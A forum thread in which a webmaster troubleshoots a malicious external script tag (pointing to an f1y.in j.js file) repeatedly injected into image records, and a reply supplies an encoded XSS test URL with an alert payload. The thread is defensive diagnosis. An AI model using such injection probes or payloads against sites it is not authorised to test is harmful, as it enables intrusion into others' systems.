Forum Moderators: open
On Friday we started having some wierd activity where pending images were being flagged as viruses by our internal scanners. I didn't think too much of it until I looked into the image table today and see that almost every pending image in the table has a script src=" followed by http:// and f1y.in and j.js (i don't want to post the whole code as it is in case it does something) and then of course it closes with a </script> tag.
when i try to go to the f1y domain i get a browser warning which won't let me access it because of suspicious activity - spyware and the like.
I've done searches on this code but can't find anyone else who's seen it however i see lots of sites infected with it. I guess its an infection.
anyways want to see if anyone else has seen this code?
It sounds like your site is vulnerable to mysql injection or cross site scripting, or both.
Try this test, swapping example.com for your site, "yourscript.cgi" for your script (probably .php), and "login_name" for any form variable in your input scripts. For example, if you have a search script with the input field named "term," swap out "login_name" for "term":
http://www.example.com/yourscript.cgi?login_name=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E%22
This test is harmless, if your site is vulnerable it will elicit a simple alert, "123." But what it tells you is data is passed through from input and echoed back to the page unfiltered, meaning a hacker can do the same thing to inject data to your database or craft a URL for cross site scripting.
This is a problem with your scripts and improperly cleansed input data.
A second possibility is that the site was hacked and someone has gained access to your site via FTP or just your database, but most often it's not even necessary.
I don't know if its a sql injection though, but it could be xss. the reason I say that is because this script is only filled into certain fields, some which aren't accessible by the form (it's a multi-page .net signup form). The form is a page which allows image uploads. It is the 3rd page of the series - and many of the fields in the previous pages are text fields, yet they aren't populated with this string.
The other thing is that I cleaned the entries that had the script in them yesterday, and today they were all back attached to the same records in the same places.
Perhaps I'm wrong about it being a sql injection, but it's persistence concerns me.
I did a google search for "f1y j.js" as f1y is the domain and the script name is j.js and I see lots of other sites seem to be infected and don't even know it.
It's just a strange thing for me because it first seems to have appeared friday, and "stopped" (for lack of a better term) Monday, however today (wednesday) it re-infected the exact same records, leaving new ones - ones created since monday.
I'm going to continue to monitor it, and we are dealing with the images individually so i'll see what happens moving forward.
Thanks again for your input - if I find out more about this thing I'll post it here
[microsoft.com...]
Somehow this thing is re-inserting itself. Mind you we didn't quite get the old images processed so perhaps when we get that done this will stop?
Also noticed the ActiveX killbits update for windows 2000 even though MS says win2k isn't affected - I applied it so we'll see if perhaps that helps.
